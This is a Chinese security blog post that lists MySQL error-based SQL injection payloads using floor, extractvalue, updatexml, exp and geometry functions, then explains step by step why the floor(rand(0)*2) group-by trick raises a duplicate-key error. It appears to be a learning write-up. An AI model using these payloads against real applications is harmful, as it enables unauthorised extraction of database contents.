<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入,">





  <link rel="alternate" href="/stom.xml" title="Goudan's blog" type="application/atom+xml">






<meta name="description" content="关于SQL注入的五大报错注入函数全部都以查user()为例子">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入报错函数总结">
<meta property="og:url" content="http://goudanjun.vip/2021/03/11/sql注入报错函数总结.html/index.html">
<meta property="og:site_name" content="Goudan&#39;s blog">
<meta property="og:description" content="关于SQL注入的五大报错注入函数全部都以查user()为例子">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.loli.net/2021/03/11/Jo9RiTMsC5Btp1e.png">
<meta property="og:image" content="https://i.loli.net/2021/03/11/AaERQkJtlxPXwyp.png">
<meta property="og:image" content="https://i.loli.net/2021/03/11/oJH7CKteA1R6EPh.png">
<meta property="og:image" content="https://i.loli.net/2021/03/11/AOJqScjifuYnN7l.png">
<meta property="og:image" content="https://i.loli.net/2021/03/11/u3PRsDgTCpS8bMK.png">
<meta property="og:image" content="https://i.loli.net/2021/03/23/gst6LGHlj754OAE.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/z3CdrTqDLPe7fks.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/vBR2oY1a9fPdblh.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/IgfpsAU4YyGXLxr.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/qWHT8L1FIEMtnur.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/AmplyH2aQWDdbuF.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/zbHPBJFY9NnvcMo.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/FyzgXVeZoid4DY2.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/fshmX71UDzJtl9G.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/z3ACZugm7pc6MB4.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/qfrw3elXzM4yWFZ.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/VdvJPs6xFBDi1uG.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/E1sS8OH63bFmwtT.jpg">
<meta property="og:image" content="https://i.loli.net/2021/03/23/7yo4WYqCmkZITfA.jpg">
<meta property="og:updated_time" content="2021-03-23T12:20:18.684Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sql注入报错函数总结">
<meta name="twitter:description" content="关于SQL注入的五大报错注入函数全部都以查user()为例子">
<meta name="twitter:image" content="https://i.loli.net/2021/03/11/Jo9RiTMsC5Btp1e.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"right","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://goudanjun.vip/2021/03/11/sql注入报错函数总结.html/">





  <title>sql注入报错函数总结 | Goudan's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Goudan's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-xssplatform">
          <a href="http://j36f673471.zicp.vip/xssme/index.php" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-XSSPlatform"></i> <br>
            
            XSSPlatform
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://goudanjun.vip/2021/03/11/sql注入报错函数总结.html/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="狗蛋菌">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Goudan's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sql注入报错函数总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-03-11T16:52:53+08:00">
                2021-03-11
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.9k 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  7 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="关于SQL注入的五大报错注入函数"><a href="#关于SQL注入的五大报错注入函数" class="headerlink" title="关于SQL注入的五大报错注入函数"></a>关于SQL注入的五大报错注入函数</h1><p>全部都以查user()为例子</p>
<a id="more"></a>

<h2 id="1-floor"><a href="#1-floor" class="headerlink" title="1.floor()"></a>1.floor()</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id = 1 and (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a)</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/03/11/Jo9RiTMsC5Btp1e.png" alt="953194-20160514223004359-1403466392"></p>
<h2 id="2-extractvalue"><a href="#2-extractvalue" class="headerlink" title="2.extractvalue()"></a>2.extractvalue()</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id = 1 and (extractvalue(1, concat(0x5c,(<span class="keyword">select</span> <span class="keyword">user</span>()))))</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/03/11/AaERQkJtlxPXwyp.png" alt="953194-20160514223041343-1723131573"></p>
<h2 id="3-updatexml"><a href="#3-updatexml" class="headerlink" title="3.updatexml()"></a>3.updatexml()</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id = 1 and (updatexml(0x3a,concat(1,(<span class="keyword">select</span> <span class="keyword">user</span>())),<span class="number">1</span>))</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/03/11/oJH7CKteA1R6EPh.png" alt="953194-20160514223111046-707785158"></p>
<h2 id="4-exp"><a href="#4-exp" class="headerlink" title="4.exp()"></a>4.exp()</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id =1 and EXP(~(<span class="keyword">SELECT</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a))</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/03/11/AOJqScjifuYnN7l.png" alt="953194-20160514223142046-1477503952"></p>
<h2 id="5-有六种函数（但总的来说可以归为一类）"><a href="#5-有六种函数（但总的来说可以归为一类）" class="headerlink" title="5.有六种函数（但总的来说可以归为一类）"></a>5.有六种函数（但总的来说可以归为一类）</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">GeometryCollection()</span><br><span class="line">id = 1 AND GeometryCollection((<span class="keyword">select</span> * <span class="keyword">from</span> (<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b))</span><br><span class="line"></span><br><span class="line">polygon()</span><br><span class="line"><span class="keyword">id</span> =<span class="number">1</span> <span class="keyword">AND</span> polygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b))</span><br><span class="line"></span><br><span class="line">multipoint()</span><br><span class="line"><span class="keyword">id</span> = <span class="number">1</span> <span class="keyword">AND</span> multipoint((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b))</span><br><span class="line"></span><br><span class="line">multilinestring()</span><br><span class="line"><span class="keyword">id</span> = <span class="number">1</span> <span class="keyword">AND</span> multilinestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b))</span><br><span class="line"></span><br><span class="line">linestring()</span><br><span class="line"><span class="keyword">id</span> = <span class="number">1</span> <span class="keyword">AND</span> LINESTRING((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b))</span><br><span class="line"></span><br><span class="line">multipolygon()</span><br><span class="line"><span class="keyword">id</span> =<span class="number">1</span> <span class="keyword">AND</span> multipolygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b))</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/03/11/u3PRsDgTCpS8bMK.png" alt="953194-20160514223651015-716657416"></p>
<h1 id="Floor-函数报错原理"><a href="#Floor-函数报错原理" class="headerlink" title="Floor() 函数报错原理"></a>Floor() 函数报错原理</h1><h2 id="一、简述"><a href="#一、简述" class="headerlink" title="一、简述"></a><strong>一、简述</strong></h2><p>floor报错注入是利用 `select count(<em>),(floor(rand(0)</em>2)) x from users group by x```这个相对固定的语句格式，导致的数据库报错。实际利用中通过 concat 函数，连接注入语句与 floor(rand(0)*2)函数，就实现了注入结果与报错信息回显的注入方式。具体利用本文不做阐述，本文重点探究该语句报错的原因，要理解该语句的报错原因，首先大家需要理解如下的关键函数的作用： count() 、group by 、floor()、rand()。</p>
<h2 id="二、关键函数说明"><a href="#二、关键函数说明" class="headerlink" title="二、关键函数说明"></a><strong>二、关键函数说明</strong></h2><h3 id="1-理解rand-函数"><a href="#1-理解rand-函数" class="headerlink" title="1.理解rand()函数"></a><strong>1.理解rand()函数</strong></h3><p>rand() 是一个随机函数，通过一个固定的随机数的种子0之后，可以形成固定的伪随机序列。结果如下图所示：</p>
<p>可见，直接使用rand函数每次产生的数都不同，但是当提供了一个固定的随机数的种子0之后：</p>
<p>这样每次产生的值都是一样的。也可以称之为伪随机（产生的数据都是可预知的）。<br>查看多个数据看一下。（users是一个有6行数据的表）</p>
<p><img src="https://i.loli.net/2021/03/23/gst6LGHlj754OAE.jpg" alt="图片.png"></p>
<p>这样第一次产生的随机数和第二次完全一样，也就是可以预测的。<br>那么floor报错注入利用的时候rand（0）*2为什么要乘以 2 呢？这就要配合floor 函数来说了。</p>
<h3 id="2-理解floor-rand-0-2-函数"><a href="#2-理解floor-rand-0-2-函数" class="headerlink" title="2.理解floor(rand(0)*2)函数"></a><strong>2.理解floor(rand(0)*2)函数</strong></h3><p>floor() 函数的作用就是返回小于等于括号内该值的最大整数，也就是取整。</p>
<p>floor(rand(0)*2）就是对rand(0)产生的随机序列诚意2后的结果，再进行取整。得到伪随机序列为如下图所示：</p>
<p><img src="https://i.loli.net/2021/03/23/z3CdrTqDLPe7fks.jpg" alt="图片.png"></p>
<p>因为使用了固定的随机数种子0，他每次产生的随机数列都是相同的0 1 1 0 1 1的顺序。</p>
<h3 id="3-group-by-函数"><a href="#3-group-by-函数" class="headerlink" title="3.group by 函数"></a><strong>3.group by</strong> <strong>函数</strong></h3><p>group by 主要用来对数据进行分组（相同的分为一组）。</p>
<p>例如建立如下表进行实验</p>
<p><img src="https://i.loli.net/2021/03/23/vBR2oY1a9fPdblh.jpg" alt="图片.png"></p>
<p>通过如下语句进行查询。（这里在a和x之前缺省了as ，作用为用a和x代替原有的字段显示），显示的结果如下图所示：</p>
<p><img src="https://i.loli.net/2021/03/23/IgfpsAU4YyGXLxr.jpg" alt="图片.png"></p>
<p>但通过group by进行分组排序是，结果会进行分组，相同名字为合并。如下图所示</p>
<p><strong>注意：</strong>最后x这列中显示的每一类只有一次，前面的a的是第一次出现的id值</p>
<p><img src="https://i.loli.net/2021/03/23/qWHT8L1FIEMtnur.jpg" alt="图片.png"></p>
<h3 id="4-理解count（-）函数"><a href="#4-理解count（-）函数" class="headerlink" title="4.理解count（*）函数"></a><strong>4.理解count（*）函数</strong></h3><p><strong>count（*）统计结果的记录数。</strong></p>
<p>这里与group by结合使用看一下：</p>
<p><img src="https://i.loli.net/2021/03/23/AmplyH2aQWDdbuF.jpg" alt="图片.png"></p>
<p>这里就是对a中的重复性的数据进行了整合，然后计数，后面的x就是每一类的数量。也就是lisi有2个，wangwu有1个，zhangsan有3个。注意显示同样是按照ascii排序。</p>
<h2 id="三、报错原因分析"><a href="#三、报错原因分析" class="headerlink" title="三、报错原因分析"></a>三、报错原因分析</h2><p>大家已经了解，当执行如下语句时，就会产生一个报错。如下图所示</p>
<p><strong>select count(*),floor(rand(0)*2) x from users group by x;</strong></p>
<p><img src="https://i.loli.net/2021/03/23/zbHPBJFY9NnvcMo.jpg" alt="图片.png"></p>
<p>根据前面函数的理解，这句话本义就是统计后面产生随机数的种类并计算每种数量。原本执行结果一共6行数据，产生的随机序列应该为0 1 1 0 1 1 ，按照语句的含义，统计如果应该是：0是2个，1是4个，但是此处却产生了报错？这是为什么呢？下面来分析一下。</p>
<p>这里最关键的及时要理解group by函数的工作过程。group by key 在执行时循环读取数据的每一行，将结果保存于临时表中。读取每一行的key时，如果key存在于临时表中，则更新临时表中的数据（更新数据时，不再计算rand值）；如果该key不存在于临时表中，则在临时表中插入key所在行的数据。（插入数据时，会再计算rand值）</p>
<p>如果此时临时表只有key为1的行不存在key为0的行，那么数据库要将该条记录插入临时表，由于是随机数，插时又要计算一下随机值，此时 floor(random(0)*2)结果可能为1，就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。</p>
<p>具体报错原因可以通过下列过程展示：</p>
<p>mysql执行结果，会产生 011011 这个序列，group by时，会建立空虚拟表如下图，然后从sql语句执行结果序列（011011）读取数据并插入虚表:</p>
<p><img src="https://i.loli.net/2021/03/23/FyzgXVeZoid4DY2.jpg" alt="图片.png"></p>
<p>（1）虚表写入第一条记录，执行floor(rand(0)*2)，发现结果为0(此时为第一次计算)</p>
<p><img src="https://i.loli.net/2021/03/23/fshmX71UDzJtl9G.jpg" alt="图片.png"></p>
<p>（2）查询虚拟表，发现0的键值不存在，则插入新的键值的时候floor(rand(0)*2)会被再计算一次，结果为1(此时为第二次计算)，插入虚表，第一条记录插入完毕，结果为1。如下图:</p>
<p><img src="https://i.loli.net/2021/03/23/z3ACZugm7pc6MB4.jpg" alt="图片.png"></p>
<p>（3）虚表写入第二条记录，再次计算floor(rand(0)<em>2)，发现结果为1(此时为第三次计算)，此时结算结果为1，所以floor(rand(0)</em>2)不会被计算，直接count(<em>)加1，第二条记录写入完毕。（5）查询虚表，发现1的键值存在，所以floor(rand(0)</em>2)不会被计算第二次，直接count(*)加1，第二条记录查询完毕，结果如下:</p>
<p><img src="https://i.loli.net/2021/03/23/qfrw3elXzM4yWFZ.jpg" alt="图片.png"></p>
<p>（4）虚表写入第三条记录，再次计算floor(rand(0)<em>2)，发现结果为0(此时为第4次计算)，计算结果为0，此时虚表中没有0的数据记录，则执行插入该数据，插入时会再次计算floor(rand(0)</em>2)（此时为第5次计算），计算结果为1。然而1这个主键已经存在于虚拟表中，而新计算的值也为1(主键键值必须唯一)，所以就产生了主键冲突的错误，也就是：Duplicate entry 的报错。</p>
<p><img src="https://i.loli.net/2021/03/23/VdvJPs6xFBDi1uG.jpg" alt="图片.png"></p>
<p>总结：</p>
<p>通过上述分析，在虚表中写入第三条记录是时，产生了报错。此时floor(rand(0)*2)一共被计算了5次，这也解释了为什么数据表中需要最少3条数据才会报错的原因。</p>
<p>另外，要注意加入随机数种子的问题，如果没加入随机数种子或者加入其他的数，那么floor(rand()<em>2)产生的序列是不可测的，这样可能会出现正常插入无法报错的情况。最重要的是前面几条记录查询后不能让虚表存在0,1键值，如果存在了，那无论多少条记录，也都没办法报错，因为floor(rand()</em>2)不会再被计算做为虚表的键值，这也就是为什么不加随机数种子有时候会报错，有时候不会报错的原因。</p>
<p>比如下面用1作为随机数种子，就不会产生报错：</p>
<p><img src="https://i.loli.net/2021/03/23/E1sS8OH63bFmwtT.jpg" alt="图片.png"></p>
<p><img src="https://i.loli.net/2021/03/23/7yo4WYqCmkZITfA.jpg" alt="图片.png"></p>
<p>参考文章：</p>
<p><a href="https://www.freebuf.com/column/235496.html" target="_blank" rel="noopener">https://www.freebuf.com/column/235496.html</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/10/PowerShell学习全记录.html/" rel="next" title="PowerShell学习全记录">
                <i class="fa fa-chevron-left"></i> PowerShell学习全记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/03/12/Fastjson漏洞复现和研究.html/" rel="prev" title="Fastjson漏洞复现和研究">
                Fastjson漏洞复现和研究 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">狗蛋菌</p>
              <p class="site-description motion-element" itemprop="description">Stay Hungry,Stay Foolish</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">25</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/stom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/goudanjun" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#关于SQL注入的五大报错注入函数"><span class="nav-number">1.</span> <span class="nav-text">关于SQL注入的五大报错注入函数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-floor"><span class="nav-number">1.1.</span> <span class="nav-text">1.floor()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-extractvalue"><span class="nav-number">1.2.</span> <span class="nav-text">2.extractvalue()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-updatexml"><span class="nav-number">1.3.</span> <span class="nav-text">3.updatexml()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-exp"><span class="nav-number">1.4.</span> <span class="nav-text">4.exp()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-有六种函数（但总的来说可以归为一类）"><span class="nav-number">1.5.</span> <span class="nav-text">5.有六种函数（但总的来说可以归为一类）</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Floor-函数报错原理"><span class="nav-number">2.</span> <span class="nav-text">Floor() 函数报错原理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、简述"><span class="nav-number">2.1.</span> <span class="nav-text">一、简述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、关键函数说明"><span class="nav-number">2.2.</span> <span class="nav-text">二、关键函数说明</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-理解rand-函数"><span class="nav-number">2.2.1.</span> <span class="nav-text">1.理解rand()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-理解floor-rand-0-2-函数"><span class="nav-number">2.2.2.</span> <span class="nav-text">2.理解floor(rand(0)*2)函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-group-by-函数"><span class="nav-number">2.2.3.</span> <span class="nav-text">3.group by 函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-理解count（-）函数"><span class="nav-number">2.2.4.</span> <span class="nav-text">4.理解count（*）函数</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、报错原因分析"><span class="nav-number">2.3.</span> <span class="nav-text">三、报错原因分析</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2019 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">狗蛋菌</span>

  
</div>





 



 




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  



  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
